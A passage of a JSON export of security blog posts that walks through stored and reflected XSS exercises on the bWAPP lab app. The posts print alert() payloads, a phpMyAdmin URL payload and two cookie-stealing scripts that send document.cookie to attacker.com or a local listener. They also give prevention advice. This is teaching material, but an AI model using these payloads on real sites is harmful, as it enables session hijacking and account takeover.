level of XSS (cross-site-scripting) attacks as it’s an add-on to the browsers to sanitize HTML responses.<br></font></li></ol><div><font size=\"4\"><br></font></div></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (Change Secret & Cookies)",
            "blog_id": "cross-site-scripting-stored-change-secret-and-cookies",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-29T19:56:34.014386Z",
            "last_updated_date": "2021-06-06T10:40:07.818150Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/seo%20_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/small%20_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/large%20_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "Cookies"
            ],
            "highlights": "This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Stored Cross-Site-Scripting attack in Change Secret and Cookies and for this demo, I'll be using bWAPP which is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/yCj45YiMQyM\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform a Stored Cross-Site-Scripting attack in Change Secret?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Change Secret)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_2.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot there is an input box to change the current user secret and if you go to the <b>phpMyAdmin </b>then you will find a secret column under \"<b>users</b>\" table.&nbsp;</font><span style=\"font-size: large;\">To test let’s enter one secret message \"</span><b style=\"font-size: large;\">Nice\"</b><span style=\"font-size: large;\">.</span></div><div><span style=\"font-size: large;\"><br></span></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_3.png\"><span style=\"font-size: large;\"><br></span></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot the \"<b>secret</b>\" has been changed to \"<b>Nice</b>\". So what's happening is actually when you enter a new secret message, it's taking the input of the secret message and also in the hidden input field it's passing the user's login name.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_4.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot in the hidden input field the user's name is passed to the server and this is always a bad practice to send the data in an input hidden field because most of the time developers forgot to validate these input fields and it will be very easy for the attacker to inject malicious code to the application.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Now let's change the input type of this \"<b>hidden</b>\" field to \"<b>text</b>\". Right-click \"<b>Inspect Element</b>\" and go to the hidden input field and change the input type to text and hit enter.</font><br></div></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_5.png\"><br></div><div><br></div><div><font size=\"4\">As per the above screenshot, you can see the attacker changing the input type to text, so that he can inject malicious code to the application.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_6.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As you can see from the above screenshot the hidden input type changed to a text input box and now let's enter the JavaScript payload to this input box.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">\"<span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span>img src<span class=\"token operator\">=</span>x onerror<span class=\"token operator\">=</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_7.png\"><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_8.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot I am able to inject JavaScript code to the input box. So in order to prevent this attack always try to avoid using hidden input fields and if you are using then do proper sanitization of special characters otherwise it’s very easy for the attacker to inject malicious code.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information?</b><br></font></div><div><ul><li><font size=\"4\"><a href=\"https://portswigger.net/research/xss-in-hidden-input-fields\"><font color=\"#dd4124\">XSS in hidden input fields</font></a><br></font></li></ul><div><br></div></div><div><b style=\"\"><font size=\"5\">How to perform a Stored Cross-Site-Scripting attack in Cookies?</font></b><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_9.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Cookies)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_10.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">As per the above screenshot, you can see an interface where which type of movie you like and if you hit the <b>Like </b>button then the message will appear that \"<b>Thank you for making your choice!</b>\".</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_11.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">Now let's intercept the request in burp suite so that we can know what’s going on in the background.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_12.png\"><font size=\"4\"><br></font></div><div><font size=\"4\">As per the above screenshot, we got the HTTP request and as you can see in cookie header the <b>movie_genre </b>is reflecting.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_13.png\"><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">As per the above screenshot, I'll pass new movie type \"</span><b style=\"font-size: large;\">thriller</b><span style=\"font-size: large;\">\" and let's check it’s reflecting or not.</span><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-change-secret-cookies/cross_site_scripting_stored_change_secret_cookies_14.png\"><font size=\"4\"><br></font></div><div><div><font size=\"4\">As you can see which movie type I passed it's reflected on the cookie header, so I could able to insert one more new movie type to the parameter. So as per this vulnerability, an attacker can able to inject malicious code into the cookie header. And in order to prevent this attack proper validation is required in the query parameter.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information?</b><br></font></div><div><ul><li><b style=\"\"><a href=\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-XSS-Protection\"><font color=\"#dd4124\">X-XSS-Protection</font></a></b><br></li></ul></div><div><font size=\"4\"><br></font></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Cross-Site-Scripting - Stored (Blog)",
            "blog_id": "cross-site-scripting-stored-blog",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-28T19:56:24.836192Z",
            "last_updated_date": "2021-06-06T10:41:07.032689Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/large_thumbnail.png",
            "keywords": [
                "Stored XSS",
                "bWAPP",
                "WAF"
            ],
            "highlights": "When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.",
            "description": "<b><font size=\"5\">Introduction to Stored XSS</font></b><div><b><font size=\"5\"><br></font></b></div><div><div style=\"\"><font size=\"4\">When an attacker browsing a web application and found a vulnerability which allows him to embed an HTML tag into the input box and the embedded tag become a permanent item of that page and then the browser will parse this code every time whenever the page will get loaded.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">For example in a blogging website attacker found a vulnerability in the comment section and embed this comment.</font></div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\"><b>Attacker's Comment</b>&nbsp;- \"<i>Nice Blog! a similar type of blog I have also written but with some new content, please visit my site to read more\"</i><br></font></div><div style=\"\"><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script src<span class=\"token operator\">=</span><span class=\"token string\">\"http://attacker.com/stealcookie.js\"</span><span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">The \"<b>stealcookie.js</b>\" is designed to steal the cookie of the browser and as this file is hosted in some other site so that the attacker can able to access it remotely and when the user's account gets compromised then the attacker will have full control to the user account.&nbsp;</font><span style=\"font-size: large;\">But the user will have no idea at all what is happening in the background with this piece of comment.</span></div></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/BcBOyzxu6YA\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">Real World Stored XSS Attack</font></b></div><div><br></div><div><font size=\"4\"><b>MySpace </b>and <b>Tweetdeck </b>are the best examples of Stored XSS and as you guys might have known when the attacker injects the JavaScript code it caused serious damage to both of these websites as once the code injected and whoever visit that webpage then it will get executed again and again.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_1.png\"><font size=\"4\"><br></font></div><div><br></div><div><b><font size=\"5\">How to prevent Stored XSS attack?</font></b><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_2.png\"><br></div><div><br></div><div><div><font size=\"4\">To prevent any XSS attack, Web Application Firewall (WAF) is the best solution to protect a web application.&nbsp;</font><span style=\"font-size: large;\">WAF is an automation tool which is designed by artificial intelligence and machine learning algorithms to filter specific content of web application and it can prevent attacks from XSS, SQL Injection, File inclusion and security misconfiguration.</span></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Every time whenever a user will send any request to the web server first the request will go the WAF and WAF will filter the request and then the request will get transferred to the web server.&nbsp;</font><span style=\"font-size: large;\">Same will be applied to the Web server also when the web server will send the response to the user first the response will go to the WAF then WAF will filter the response then it will get transferred to the user.</span><br></div></div><div><br></div><div><b><font size=\"5\">For more information</font></b></div><div><ul><li><font size=\"4\"><a href=\"https://en.wikipedia.org/wiki/Web_application_firewall\"><font color=\"#dd4124\"><b>Web application firewall</b></font></a></font><br></li><li><b><a href=\"https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/\"><font color=\"#dd4124\">What is a Web Application Firewall (WAF)?</font></a></b><br></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform Stored XSS in a Blogging web application?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_3.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Stored (Blog)</b> from the drop-down menu and click Hack.</font><br></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_4.png\"><font size=\"4\"><br></font></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot it's a demo blogging application and there is an input box where user can comment. So to test let's enter one comment \"<b>Nice Blog</b>\" and hit submit.</font></div></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_5.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see from the screenshot the comment gets posted and this comment gets stored in the database. So now let's enter the JavaScript payload to steal the browser cookie.</font></div></div><div><font size=\"4\"><br></font></div><div><b><font size=\"5\">Payload comment to steal the cookie</font></b><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token maybe-class-name\">Nice</span> <span class=\"token maybe-class-name\">Blog</span><span class=\"token operator\">!</span> a similar type <span class=\"token keyword\">of</span> blog <span class=\"token constant\">I</span> have also written but <span class=\"token keyword\">with</span> some <span class=\"token keyword\">new</span> <span class=\"token class-name\">content</span><span class=\"token punctuation\">,</span> please visit my site to read more</code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script src<span class=\"token operator\">=</span><span class=\"token string\">\"http://192.168.2.12:9000?cookie\"</span><span class=\"token operator\">+</span><span class=\"token dom variable\">document</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">cookie</span><span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_6.png\"><br></div><div><br></div><div><div><font size=\"4\">As you can see from the above screenshot the comment gets posted in the blog and with the comment, I am injecting the JavaScript code also and this is a <b>GET </b>request with a query parameter \"<b>cookie</b>\" and \"<b>document.cookie</b>\" will fetch the current browser cookie. And I'll fetch this request with the <a href=\"https://en.wikipedia.org/wiki/Netcat\"><font color=\"#dd4124\"><b>netcat</b> </font></a>command through a reverse shell.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-stored-blog/cross_site_scripting_stored_blog_7.png\"><font size=\"4\"><br></font></div><div><br></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": " "
        },
        {
            "title": "Cross-site-Scripting - Reflected (phpMyAdmin & PHP_SELF)",
            "blog_id": "cross-site-scripting-reflected-phpMyAdmin-and-php_self",
            "author": "Anshuman Pattnaik",
            "published_date": "2019-05-27T19:56:16.165494Z",
            "last_updated_date": "2021-06-06T10:42:25.554377Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/large_thumbnail.png",
            "keywords": [
                "Reflected XSS",
                "bWAPP",
                "phpmyAdmin"
            ],
            "highlights": "This is the demonstration of Cross-Site-Scripting attack in phpMyAdmin and PHP_SELF and for this demo, I’ll be using bWAPP and bWAPP is a buggy web application and we can use to test various vulnerabilities in the web.",
            "description": "<div><font size=\"4\">This is the demonstration of Cross-Site-Scripting attack in phpMyAdmin and PHP_SELF and for this demo, I'll be using bWAPP which is a buggy web application and we can use to test various vulnerabilities in the web.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">bWAPP Official Link:- <a href=\"http://www.itsecgames.com/\"><font color=\"#dd4124\">http://www.itsecgames.com/</font></a></font></div><div><br></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/qABCSgC4GWw\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><b><font size=\"5\">How to perform a Cross-Site Scripting attack in phpMyAdmin?</font></b><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_1.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Reflected (phpMyAdmin)</b> from the drop-down menu and click Hack.</font><br></div><div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_2.png\"><br></div><div><br></div><div><font size=\"4\">So this is a phpMyAdmin cross-site scripting bug and you can see the message here that</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\" language-js\">The phpMyAdmin version fails to validate BBcode tags in the error.php script! and HINT is \"CVE-2010–4480\"</pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">If you search this id on their website then you will find the details of this particular vulnerability. And when I search this id <b>(CVE-2010-4480)</b> as per their search result, it shows that on version no 3.3.8.1 there was a cross-site scripting vulnerability found in phpMyAdmin files and an attacker can able to inject JavaScript code in the URL parameter.</font></div></div><div><font size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_3.png\"><font size=\"4\"><br></font></div><div><br></div><div><font size=\"4\">For example, there was an XSS bug found in the db_central_columns.php file query parameter.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">http<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>localhost<span class=\"token operator\">/</span>phpmyadmin<span class=\"token operator\">/</span>db_central_columns<span class=\"token punctuation\">.</span><span class=\"token property-access\">php</span><span class=\"token operator\">?</span>total_rows<span class=\"token operator\">=</span><span class=\"token number\">0</span>\"<span class=\"token operator\">&gt;</span><span class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><div><font size=\"4\">And it was a major bug found in phpMyAdmin and by this, an attacker can do serious damage to the database. But till now in most of the phpMyAdmin version, this bug already fixed.</font></div></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>For more information please check CVE report.</b></font></div><div><ul><li><a href=\"https://cve.circl.lu/cve/CVE-2010-4480\"><font color=\"#dd4124\"><b>CVE-2010-4480</b></font></a><br></li></ul></div><div><br></div><div><b><font size=\"5\">How to perform a Cross-Site Scripting attack in PHP_SELF?</font></b><br></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_4.png\"><br></div><div><br></div><div><font size=\"4\">Now please choose <b>Cross-site-Scripting - Reflected (PHP_SELF)</b> from the drop-down menu and click Hack.</font><br></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_5.png\"><b><font size=\"5\"><br></font></b></div><div><br></div><div><div><font size=\"4\">As you can see here we got the same user interface again which we found in (GET &amp; POST) sections - <a href=\"https://hackbotone.com/blog/cross-site-scripting-reflected-phpMyAdmin-and-php_self\"><font color=\"#dd4124\">Cross-site-Scripting — Reflected (GET &amp; POST)</font></a>. So let's enter the first name and last name if it is reflecting then we can inject JavaScript code.</font></div></div><div><b><font size=\"5\"><br></font></b></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_6.png\"><b><font size=\"5\"><br></font></b></div><div><br></div><div><font size=\"4\">As you can see the first name and last name reflects on the webpage, so let's enter the JavaScript code.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\"><span class=\"token operator\">&lt;</span>script<span class=\"token operator\">&gt;</span><span class=\"token function\">alert</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&lt;</span><span class=\"token operator\">/</span>script<span class=\"token operator\">&gt;</span></code></pre><div class=\"toolbar\"><div class=\"toolbar-item\"><button type=\"button\">Copy</button></div></div></div><br></div><div><img src=\"https://assets.hackbotone.com/assets/cross-site-scripting-reflected-phpmyadmin-php-self/cross_site_scripting_reflected_phpmyadmin_php_self_7.png\"><br></div><div><br></div><div><div><font size=\"4\">And as you can see I am able to inject JavaScript code and a better way to prevent this attack if we do proper sanitization of special characters then we can prevent this bug. And every time when you are developing a web application then please follow OWASP guidelines. In that way at least you can reduce common vulnerability in the websites.</font></div></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">For more information?</font></b></div><div><ol><li><font size=\"4\"><font color=\"#dd4124\"><a href=\"https://www.owasp.org/index.php/Main_Page\"><font color=\"#dd4124\">OWASP Foundation</font></a></font></font><br></li></ol><div><font size=\"4\"><br></font></div></div><div><span style=\"font-size: large;\">Thank you for reading this post and Happy Hacking :)</span><br></div><div><br></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        }
    ]
}